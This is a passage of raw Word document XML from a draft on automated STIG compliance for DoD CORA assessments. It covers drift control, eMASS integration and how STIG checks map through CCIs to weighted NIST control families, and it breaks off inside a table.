          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Automated STIG Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD41FC4" w14:textId="51149A2E" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cyber Maintenance makes up 50% of a Command and Combatant’s total CORA score, meaning continuous Security Technical Implementation Gude (STIG) and Security Requirements Guide (SRG) compliance is non-negotiable. Because CORA eliminates the long preparation window of legacy CCRIs, manual STIG remediation is no longer operationally viable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826B771" w14:textId="4327FB1A" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Continuous Baseline Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D9ED7" w14:textId="732846AD" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>With short-notice 30-day assessment warnings, networks must be in a constant state of non-stop hardening to include defense-in-depth approaches and constant review of security control effectiveness with strategic layered security activities to further bolster defensive resiliencies. Automation platforms continuously scan and (remotely and automatically) enforce baseline configurations across entire DoD environments, not just a small sampling of the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF9E45" w14:textId="578B5EC9" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Configuration Drift Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7243D4" w14:textId="70CEC7E6" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Even when a network is “perfectly” STIG-compliant, daily operational changes introduce “drift.” Automation tools automatically catch unauthorized deviations, rollback non-compliant changes, and maintain a defensible state 24x7x365.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37232D43" w14:textId="78723ADD" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tool Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB40129" w14:textId="0FEAFB93" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Modern DoD setups deploy specialized automation suites (such as SteelCloud ConfigOS or network digital twins) to link STIG scanning directly into broader federal and military governance loops. These systems feed near-real-time compliance tracking data straight into platforms like eMASS, Splunk, and ServiceNow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279A1A2" w14:textId="6535C345" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="001C16B0" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Continuous CORA Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A2021" w14:textId="35B740DE" w:rsidR="00F007AA" w:rsidRDefault="00F007AA" w:rsidP="00F007AA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Adversary threat intelligence changes / MITRE ATT&amp;CK Updates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>↓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JFQH-DoDIN reweighs specific metrics to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> KIORs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>↓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Automated STIG tools detect drift </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> perimeter systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>↓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Continuous baseline achieved (Ready </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>notice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53117270" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066D91C9" w14:textId="5E252BE2" w:rsidR="001C16B0" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To build a continuous compliance loop, you need to understand how DISA STIGs translate into eMASS security controls, how the CORA program prioritizes them, and how to automate the validation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A9A9F2" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How CORA Weights NIST Security Controls in eMASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E955CC" w14:textId="6261A8D1" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Defense Information Systems Agency (DISA) distributes STIG checklists, while NIST SP 800-53 (Rev</w:t>
      </w:r>
      <w:r w:rsidR="00F007AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ision</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5) defines the eMASS control families. To link the two, the DoD utilizes </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Control Correlation Identifiers (CCIs)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every single STIG check </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a unique CCI, which in turn populates a corresponding NIST security control inside eMASS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667716F4" w14:textId="0DF9B82A" w:rsidR="00D66D8A" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Under the CORA framework, controls are not scored equally. JFHQ-DODIN overlays a threat-informed filter on top of standard eMASS baselines, heavily </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>weighing</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific NIST control families:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0FFE1" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="005D3438" w:rsidRDefault="00B4067B" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0084BE6B" w14:textId="27A024BA" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r w:rsidR="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> X.X</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3117"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66D8A" w:rsidRPr="005D3438" w14:paraId="5A6B22E2" w14:textId="77777777" w:rsidTr="00D66D8A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1819CFD2" w14:textId="21D1FF39" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>NIST Control Family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="314671DF" w14:textId="6554AA40" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CORA Strategic Focus &amp; Weighing Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="768B55E5" w14:textId="44D94923" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Critical Target Areas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66D8A" w:rsidRPr="005D3438" w14:paraId="2E30F0C6" w14:textId="77777777" w:rsidTr="009151D7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B261922" w14:textId="12C03D12" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC (Access Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CF0A616" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F90101"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Extremely High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="459226D3" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EAEDF79" w14:textId="472084C4" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Direct correlation with adversary initial access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFAFCAA" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F9F0FCE" w14:textId="2D3E6B80" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
